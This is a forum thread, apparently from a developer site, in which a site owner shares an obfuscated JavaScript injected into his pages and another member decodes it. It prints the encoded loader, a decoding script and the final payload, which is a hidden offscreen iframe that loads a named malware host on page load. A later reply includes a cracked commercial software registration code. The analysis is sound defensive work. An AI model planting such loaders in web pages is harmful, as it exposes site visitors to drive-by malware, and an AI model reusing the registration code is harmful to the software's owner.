 |
|
A hacker added a JavaScript to many html pages of my site. Just after the body-tag he added:
<!----><script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29, 48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,10 0,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,98 ,106,101,90,91,36,89,103,92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94, 101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95, 97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,1 02,87,89,23,51,21,93,104,98,56,90,89,50,3,-1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;288-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script>-->
It somehow directs the browser to a site where the hacker deposited some malware for automatic download.
But I do not understand the details.
try{1-prototype;}catch(asd){x=2;} somehow sets x to 2 - but how does that happen?
v="eva";}if(v)e=window[v+"l"]; somehow creates an eval statement.
f (and then also w) contain an encrypted statement.
In the for loop, the statement gets decrypted by s=s+fromCharCode((w[j]*1+(9+eval("j%3"))));
and finally executed by e(s);.
Since I hardly ever write JavaScript, I fail to understand the details.
I hope that you have fun with analysing that script, and that you can share some hints on its function.
|
|
|
|
|
The original javascript is the long array of bytes, written as numbers so it is not easy to read it. The part of the code that gets executed just converts the array back to its original script text and executes it. You need to take actions protect your website from this sort of malware injection.
One of these days I'm going to think of a really clever signature.
|
|
|
|
|
With the first bit, the try statement - it's code designed to fail, so the catch blocks steps in and sets x = 2.
After I pasted the code, there appeared to be two commas missing from between elements in the array - either that or 2 numbers were broken in half. So I'm still not sure that I've guessed correctly.
After some mind-numbing tracing, I got to a situation where the s in the e(s) statement is equal to:
"
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999e�
(9��ggsk/tpd!�>! iurq;-0msoed.dpfbrjpl/ec0n_jo,qin#<��jdsn,je�>!%gskJe%<��epavncou,cpbz/_qqcoeAijje)ggsk*<��~9��ujobpx,poj�
`c"<�hqlCcc="
Which looks like junk to me, so I'll try again to paste the array correctly.
Wouldn't you just love to throttle the sod that did this..
EDIT: Had another try - I had inserted extra commas the first time round - this was clearly wrong. This time I removed the spaces, wrapped it into a funtion and removed the final eval, outputting instead to the console. Here's the re-written code and the final payload. Enjoy!
function injectedCrap()
{
try{1-prototype;}catch(asd){x=2;}
if(x)
{
fr="fromChar";
f=[ 4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,
29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,
90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,
97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,
3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,
94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,
50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,
102,50,30,35,46,48,47,90,100,29, 48,4,0,94,93,104,98,
37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,
90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,
23,95,106,105,103,48,36,38,98 ,106,101,90,91,36,89,103,
92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94,
101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,
98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,
101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,
93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,
102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1 ];
v="eva";
}
if(v)
e=window[v+"l"];
w=f;
s=[];
r=String;
z=((e)?"Code":"");
zx=fr+z;
for(i=0;288-5+5-i>0;i+=1)
{
j=i;
if(e)
s=s+r[zx]((w[j]*1+(9+e("j%3"))));
}
console.log(s);
}
Which, when all is done and dusted evaluates to this nasty piece of work:
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://lundf-creation.de/main.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
Dirty elephanters!
modified 30 Jul '12 - 7:59.
|
|
|
|
|
|
|
In case that the hacker comes back (I hope that won't happen...), I'll post his new creation here.
Now I understand how drive-by infections work: open a "harmless" page with the injected script, an iframe is opened outside the visible area, and from there some malware gets installed. Really nice. Fortunately my computer was found clean after a 30 hours scan with 4 virus scanners.
|
|
|
|
|
nice job!
That's pretty crafty there, on the original Javascript, an iFrame off the browser window, hidden from view.
Your code is crafty too.
|
|
|
|
|
Thanks Jim. 
I've a 20 year history of reversing code - I taught myself to program in x86 ASM during high-school by dissasembling whatever programs I had to hand.
It's just a matter of experience/exposure, I guess.
|
|
|
|
|
So you must be around 48,
I took computer class in summer school of 1974 with wood shop. We had a Western Electric teletype machine, that stored our programs on yellow paper tape with rubber bands.
So we wrote programs in basic on paper, and typed them in, and ran them on a Sigma 7 Mainframe at UC Irvine.
In high school, I dropped computer class and took surf class instead, counted as a PE credit, should of stuck with it. Oh well.
Didn't pick up computers again till 1986, bought a IBM XT, but didn't know what to do with it, so I wrote programs in basic, and ran them off floppy disks. Bought a hard drive 2 years later.
I can reverse engineer a lot of things, but not code down to that level.
|
|
|
|
|
Nah, I'm just a young'n - 35, Wed next week, in fact.
Neato! Dad used to bring home punch cards for us to draw on as kids, back I suppose in about 1982 or so. We had a ball trying to imagine what all the 'dots' were that we were trying to join-up.
I think I was first exposed to Basic in about 1985 or so - A girl down the road had a ?? and I can remember vividly entering a program that would calculate your age in the year 2000 - a time that seemed a million years away. Damn - nearly as far past it now as we were before it, back then!
Isn't it funny where life takes us? I picked up programming when we were forced to occupy the computer-room at school when on detention.. I quickly swiped turbo Pascal 6 and Turbo C++ 3.1 from the network. But when a fellow nerd gave me a copies of his dad's TASM, MASM and Sourcer commenting dissasembler I was like a you-know-what in a you-know where! Still don't know what would have happened if I'd behaved that way I was supposed to back then..
Oh how I do envy you - we got our first piece of computerized anything in about 1990 when M&D spent about $4000 on a 386-33 complete with a whopping 40Mb HDD and 4, thats right count 'em, 4 MB of RAM.. That was an enormous purchase for m&d back then.
I was a bright but lonely kid, so was probably really lucky to have been exposed to computers at that time of my life - I still remember the stunning, overwhelming joy I felt as a 16 year old when I reverse-engineered the registration-code for UniVBE (video bios extender software) and turned shareware software into a registered version. 
Heck, I still remember the reg code for Sourcer - B309868-ytht 20 years after I got it..
Now, if only I could reverse engineer people and social situations. :laughs:
Simon.
|
|
|
|
|
|
Submit an article or tip
Post your Blog
News 
Suggestion 
Bug 
Joke 
Rant 
Admin